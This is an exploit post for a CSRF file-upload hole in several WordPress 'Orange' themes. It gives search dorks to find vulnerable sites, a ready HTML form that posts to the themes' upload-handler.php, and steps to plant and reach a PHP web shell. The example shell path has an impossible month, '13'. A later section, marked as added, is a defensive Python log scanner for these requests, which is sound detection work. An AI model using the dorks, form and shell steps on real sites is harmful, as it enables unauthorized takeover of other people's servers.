WordPress Orange Themes CSRF File Upload Vulnerability
Dork:
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
inurl:"/wp-content/themes/kernel-theme/"
Exploit : localhost/wp-content/themes/nama-tema/functions/upload-handler.php
CSRF:
<form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post">
  Your File: <input name="uploadfile" type="file" /><br />
  <input type="submit" value="upload" />
</form>
Proof Of Concept
1. Dorking
2. Exploitation: if the site is vulnerable, an error appears.
3. Upload a .php shell with the CSRF form. If it succeeds, the file name is shown ^_^ If a "no php" notice appears, the upload failed; try bypassing with another format :(
File Access: http://site-target/wp-content/uploads/[years]/[month]/your_shell.php
Example: http://127.0.0.1/wp-content/uploads/2013/13/shell.php
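For defenders, an added example (not part of the original post): a Python check over web server access logs that flags requests to a theme's functions/upload-handler.php and requests for script-type files under the dated wp-content/uploads tree. It assumes common/combined log format; the log lines, IP addresses and the extension list (php, phtml, phar) are constructed for illustration.

```python
import re

# Assumed input: Apache/nginx common or combined log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The theme upload endpoint named in the post, under any theme directory.
HANDLER_RE = re.compile(
    r'^/wp-content/themes/[^/]+/functions/upload-handler\.php(?:\?|$)', re.I)
# Script-type files requested from the dated uploads tree.
SCRIPT_RE = re.compile(
    r'^/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|$)', re.I)

def scan(lines):
    """Return (kind, ip, path, status) findings in log order."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        path, status = m["path"], int(m["status"])
        if HANDLER_RE.match(path):
            kind = "handler_post" if m["method"] == "POST" else "handler_probe"
        elif SCRIPT_RE.match(path):
            # 200 means the file exists and was handled by the server.
            kind = "script_served" if status == 200 else "script_probe"
        else:
            continue
        findings.append((kind, m["ip"], path, status))
    return findings

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2013:10:00:01 +0000] "GET /wp-content/themes/rockstar-theme/style.css HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Mar/2013:10:02:11 +0000] "GET /wp-content/themes/rockstar-theme/functions/upload-handler.php HTTP/1.1" 200 87',
    '203.0.113.9 - - [10/Mar/2013:10:02:40 +0000] "POST /wp-content/themes/rockstar-theme/functions/upload-handler.php HTTP/1.1" 200 31',
    '198.51.100.7 - - [10/Mar/2013:10:03:02 +0000] "GET /wp-content/uploads/2013/03/photo.jpg HTTP/1.1" 200 48211',
    '203.0.113.9 - - [10/Mar/2013:10:03:15 +0000] "GET /wp-content/uploads/2013/03/a.php HTTP/1.1" 200 12',
    '203.0.113.9 - - [10/Mar/2013:10:03:20 +0000] "GET /wp-content/uploads/2013/03/b.phtml?x=1 HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A handler_post followed by a script_served from the same client is the sequence the proof of concept above describes.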